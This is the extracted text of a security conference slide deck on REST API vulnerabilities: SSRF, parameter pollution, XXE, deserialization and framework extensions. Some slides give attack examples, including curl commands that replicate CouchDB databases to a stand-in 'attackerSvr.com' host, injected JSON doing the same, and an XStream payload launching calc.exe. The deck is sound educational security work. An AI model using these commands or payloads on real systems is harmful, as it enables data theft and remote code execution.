Slide 1

Slide 1 text

SESSION ID: RESTing on Your Laurels Will Get You Pwnd ASEC-R01 Abraham Kang Director Engineering Samsung @KangAbraham Alvaro Muñoz Sanchez Senior Security Researcher HP Fortify @pwntester Dinis Cruz (in absentia) Principal Security Engineer Security Innovation @DinisCruz

Slide 2

Slide 2 text

#RSAC Goals and Main Point  Originally a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs.  Remember that a REST API is nothing more than a web application which follows a structured set of rules.  So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection, etc.  We are going to show you how remote code execution and data filtration manifest themselves in REST APIs.

Slide 3

Slide 3 text

#RSAC REST History  Introduced to the world in a PHD dissertation by Roy Fielding in 2000.  Promoted the idea of using HTTP methods (PUT, POST, GET, DELETE) and the URL itself to communicate additional metadata as to the nature of an HTTP request.  GET http://svr.com/customers/123  POST http://svr.com/customers/123

Slide 4

Slide 4 text

#RSAC Causes of REST Vulnerabilities  Location in the trusted network of your data center  SSRF (Server Side Request Forgery) to Internal REST APIs  URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI)  Self describing nature  Inbred Architecture  Incorrect assumptions of application behavior  Input types and interfaces  Extensions in REST frameworks that enhance development of REST functionality at the expense of security

Slide 5

Slide 5 text

#RSAC Attacking An Internal Network (REST style)  Find an HTTP REST proxy w/ vulns  Figure out which REST based systems are running on the internal network  Exfiltrate data from the REST interface of the backend system or GET RCE on internal REST API  What backend systems have a REST API:  ODATA in MS SQL Server  Beehive and OAE RESTful API  Neo4j, Mongo, Couch, Cassandra, Hbase, your company, and many more X Non-compromised machine Y Affected machine SAP REST API SAP AS5 … Pub REST API Mongo Couch Neo4j Cassan HBase … REST API REST API REST API REST API REST API REST API REST EAI EII ESB

Slide 6

Slide 6 text

#RSAC SSRF (Server Side Request Forgery) to Internal REST APIs  Public REST Services attack Internal REST services (in the DMZ)  Enablers: RFI (Remote File Inclusion) through PHP include(), REST framework specific proxy (RESTlet Redirector), XXE, WS-* protocols, etc.  Causes: Concatenation in URLs built to connect to internal REST services or arbitrary xml loaded by server  Many internal REST APIs are using basic auth over SSL. So you can use the same attacks above to find the basic auth credentials on the file system and embed them in the URL:  http://user:[email protected]/xxx...

Slide 7

Slide 7 text

#RSAC What to Look For  new URL (“http://yourSvr.com/value” + var);  new Redirector(getContext(), urlFromCookie, MODE_SERVER_OUTBOUND );  HttpGet(“http://yourSvr.com/value” + var);  HttpPost(“http://yourSvr.com/value” + var);  restTemplate.postForObject( ”http://localhost:8080/Rest/user/” + var, request, User.class );  ...

Slide 8

Slide 8 text

#RSAC HPP (HTTP Parameter Pollution)  HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola and Luca Carettoni in 2009. It utilized the discrepancy in how duplicate request parameters were processed to override application specific default values in URLs. Typically attacks utilized the “&” character to fool backend services in accepting attacker controlled request parameters.

Slide 9

Slide 9 text

#RSAC Extended HPPP (HTTP Path & Parameter Pollution)  Extended HPPP utilizes matrix and path parameters, JSON injection and path segment characters to change the underlying semantics of a REST URL request.  “#” can be used to remove ending URL characters similar to “--” in SQL Injection and “//” in JavaScript Injection  “../” can be used to change the overall semantics of the REST request in path based APIs (vs query parameter based)  “;” can be used to add matrix parameters to the URL at different path segments  The “_method” query parameter can be used to change a GET request to a PUT, DELETE, and sometimes a POST (if there is a bug in the REST API)  Special framework specific query parameters allow enhanced access to backend data through REST API. The “qt” parameter in Apache Solr  JSON Injection is also used to provide the necessary input to the application receiver.

Slide 10

Slide 10 text

#RSAC Faking Out Security Filters (Scenario) User • Hacker Security Filter/Servlet • Allows GET requests for public but POST, PUT and DELETE for only admin users • /creditInfo REST Service • Provides credit info

Slide 11

Slide 11 text

#RSAC Faking Out Security Filters (Bypass) User • Hacker • “_method” parameter • “X-HTTP-Method- Override” header Security Filter/Servlet • Looks like a GET but turns into PUT, POST, or DELETE • creditInfo?_method=PUT REST Service • Updates credit info

Slide 12

Slide 12 text

#RSAC Extended HPPP (Apply Your Knowledge I) String entity = request.getParameter(“entity”); String id = request.getParameter(“id”); URL urlGET = new URL(“http://svr.com:5984/client/” + entity + “?id=“ + id ); Change it to a POST to the following URL http://svr.com:5984/admin User App Server Calls Backend REST Service

Slide 13

Slide 13 text

#RSAC Extended HPPP (Apply Your Knowledge I) String entity = request.getParameter(“entity”); String id = request.getParameter(“id”); URL urlGET = new URL(“http://svr.com:5984/client/” + “../admin” + “?id=“ + “1&_method=POST” ); Change it to a POST to the following URL http://svr.com:5984/admin User App Server Calls Backend REST Service

Slide 14

Slide 14 text

#RSAC REST is Self Describing and Predictable  What URL would you first try when gathering information about a REST API and the system that backs it?

Slide 15

Slide 15 text

#RSAC REST is Self Describing  What URL would you first try when gathering information about a REST API and the system that backs it?  http://host:port/  Compare this to:  Select * from all_tables (in Oracle)  sp_msforeachdb 'select "?" AS db, * from [?].sys.tables' (SQL Server)  SELECT DISTINCT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME IN ('columnA','ColumnB') AND TABLE_SCHEMA='YourDatabase'; (My SQL)  Etc.

Slide 16

Slide 16 text

#RSAC Especially for NoSQL REST APIs  All of the following DBs have REST APIs which closely follow their database object structures  HBase  Couch DB  Mongo DB  Cassandra.io  Neo4j

Slide 17

Slide 17 text

#RSAC HBase REST API  Find all the tables in the Hbase Cluster:  http://host:9000/  Find the running HBase version:  http://host:9000/version  Find the nodes in the HBase Cluster:  http://host:9000/status/cluster  Find a description of a particular table’s schema(pick one from the prior link):  http://host:port/profile/schema

Slide 18

Slide 18 text

#RSAC Inbred Architecture  Externally exposed REST APIs typically use the same communication protocol (HTTP) and REST frameworks that are used in internal only REST APIs.  Any vulnerabilities which are present in the public REST API can be used against the internal REST APIs.

Slide 19

Slide 19 text

#RSAC Incorrect assumptions of REST application behavior  People still thinking web when developing public REST APIs:  http://www.svr.com/view_profile?id=12345  http://www.srv.com/credit_report?user_id=123-45-6789  http://www.abc.com/find_friends?phone_nums=410-555-1212,310-123-4567  REST provides for dynamic URLs and dynamic resource allocation

Slide 20

Slide 20 text

#RSAC REST provides for dynamic URLs and dynamic resource allocation Example Case Study  You have an Mongo DB REST API which exposes two databases which can only be accessed at /realtime/* and /predictive/*  There are two static ACLs which protect all access to each of these databases Realtime User /realtime/* Predictive Analysis User /predicitive/* Can anyone see the problem? You should be able to own the server with as little disruption to the existing databases.

Slide 21

Slide 21 text

#RSAC Example Case Study Exploit  The problem is not in the two databases. The problem is that you are working with a REST API and resources are dynamic.  So POST to the following url to create a new database called test which is accessible at “/test”: POST http://svr.com:27080/test  Then POST the following: POST http://svr.com:27080/test/_cmd  With the following body: cmd={…, “$reduce”:”function (obj, prev) { malicious_code() }” …

Slide 22

Slide 22 text

#RSAC REST Input Types and Interfaces  Does anyone know what the main input types are to REST interfaces?

Slide 23

Slide 23 text

#RSAC REST Input Types and Interfaces  Does anyone know what the main input types are to REST interfaces?  XML and JSON

Slide 24

Slide 24 text

#RSAC XML Related Vulnerabilities  When you think of XML--what vulnerabilities come to mind?

Slide 25

Slide 25 text

#RSAC XML Related Vulnerabilities  When you think of XML--what vulnerabilities come to mind?  XXE (eXternal XML Entity Injection) / SSRF (Server Side Request Forgery)  XSLT Injection  XDOS  XML Injection  XML Serialization

Slide 26

Slide 26 text

#RSAC XXE (File Disclosure and Port Scanning)  Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.  XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: ]> &y; *See Attacking processing by Nicolas Gregoire (Agarri) and XML Out-of-Band Data Retrieval by Timur Yunusov and Alexey Osipov

Slide 27

Slide 27 text

#RSAC XXE (Remote Code Execution)  Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.  XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: ]> &y; *See XXE: advanced exploitation, d0znpp, ONSEC *expect protocol requires pexpect module to be loaded in PHP *joernchen has another example at https://gist.github.com/joernchen/3623896

Slide 28

Slide 28 text

#RSAC XXE Today  At one time most REST frameworks were vulnerable to XXE  But newer versions have patched this vulnerability  XXE on SpringMVC last summer  XEE on Restlet last month  XXE on Jboss Seam recently  …

Slide 29

Slide 29 text

#RSAC XML Serialization Vulnerabilities  Every REST API allows the raw input of XML to be converted to native objects. This deserialization process can be used to execute arbitrary code on the REST server.

Slide 30

Slide 30 text

#RSAC Understanding XML Serialization  Mainly Three Mechanisms Used by Server Logic  Server looks where to go before going  Create an object based on the target type defined in the application then assign values from the xml to that instance  Server asks user where to go  Create and object based on a user specified type in the provided XML then assign values (to public or private fields) from the xml to that instance, finally cast the created object to the target type defined in the application  Server asks user where to go and what to do  Create and object based on a user specified type in the provided XML then assign values from the xml to that instance, allow object assignments and invoke arbitrary methods on the newly created instance, finally cast the created object to the target type defined in the application

Slide 31

Slide 31 text

#RSAC Vulnerable XML Serialization APIs  In our research we found one API that “asks the user where to go”:  XStream  More limited  Cannot invoke methods  Relies on existing APIs to trigger the code execution  And another that “asks the user where to go and what to do”:  XMLDecoder  Unrestricted  Execute arbitrary methods on newly created objects which are defined in the input  Near Turing complete

Slide 32

Slide 32 text

#RSAC XML Serialization RCE – Restlet/XMLDecoder

Slide 33

Slide 33 text

#RSAC XML Serialization RCE – Restlet/XMLDecoder

Slide 34

Slide 34 text

#RSAC XML Serialization RCE – Restlet/XMLDecoder Demo

Slide 35

Slide 35 text

#RSAC XML Serialization RCE – SpringMVC/XStream  XStream is not exactly a marshaller as it allows full object serialization  http://xstream.codehaus.org/converters.html contains a complete list of objects that can be serialized  One interesting class: DynamicProxyConverter

Slide 36

Slide 36 text

#RSAC What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class field1 field2 method1 method2 method3

Slide 37

Slide 37 text

#RSAC What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3 Interface method1 method2

Slide 38

Slide 38 text

#RSAC Custom code What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3 Interface method1 method2 Proxy

Slide 39

Slide 39 text

#RSAC Turning a Feature into a Bug  Attacker’s plan: • Find out what Class the XML will be deserialized to • Create a proxy for that Class the WebService is waiting for • Intercept/hook any call to any method in the interface • Replace the original call with the malicious payload • Send the serialized version of the proxy • Cross-fingers • Profit

Slide 40

Slide 40 text

#RSAC The wall is the SERVER … … and believe it or not this man is a dynamic proxy!

Slide 41

Slide 41 text

#RSAC Exploit 1 john smith [email protected]

Slide 42

Slide 42 text

#RSAC Exploit org.company.model.Contact calc.exe start 1 john smith [email protected]

Slide 43

Slide 43 text

#RSAC XML Serialization RCE – SpringMVC/XStream Demo

Slide 44

Slide 44 text

#RSAC JSON Serialization  ODATA  … { “type” : “namespace.Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  Ruby on Rails  { “json_class” : “package::Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  JSON.NET  { “$type” : “namespace.Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  Other frameworks work similarly

Slide 45

Slide 45 text

#RSAC Extensions in REST frameworks that enhance development of REST functionality at the expense of security  Turns remote code execution and data exfiltration from a security vulnerability into a feature.  In some cases it is subtle:  Passing in partial script blocks used in evaluating the processing of nodes.  Passing in JavaScript functions which are used in map-reduce processes.  In others it is more obvious:  Passing in a complete Groovy script which is executed as a part of the request on the server. Gremlin Plug-in for Neo4j.  Passing in the source and target URLs for data replication

Slide 46

Slide 46 text

#RSAC Rest Extensions Data Exfiltration Example (Couch DB)  curl –vX POST http://internalSrv.com:5984/_replicate –d ‘{“source”:”db_name”, “target”:”http://attackerSvr.com:5984/corpData”}’ –H “Content-Type: application/json”  curl –vX POST http://srv.com:5984/_replicate –d ‘{“source”:”http://anotherInternalSvr.com:5984/db”, “target”:”http://attackerSvr.com:5984/corpData”}’ –H “Content-Type: application/json”

Slide 47

Slide 47 text

#RSAC Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL urlPost = new URL(“http://svr.com:5984/customers/” + id); String name = request.getParameter(“name”); String json = “{\”fullName\”:\”” + name + “\”}”; How can you exfiltrate the data given the above?

Slide 48

Slide 48 text

#RSAC Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL url = new URL(“http://svr.com:5984/customers/../_replicate”); String name = request.getParameter(“name”); String json = “{\”fullName\”:\”X\”, \”source\”:\”customers\”, \”target\”:\”http://attackerSvr.com:5984/corpData\”}”; Attacker provides: id = “../_replicate” name = ‘X”, “source”:”customers”, “target”:”http://attackerSvr.com:5984/corpData’

Slide 49

Slide 49 text

#RSAC Conclusion  Publically exposed and/or internal REST APIs ease integration but can be fraught with risk.  This talk gave you exposure to some of the common problems in REST based applications.

Slide 50

Slide 50 text

#RSAC Questions/Call To Action ? Abe: @KangAbraham Alvaro: @pwntester Dinis: @DinisCruz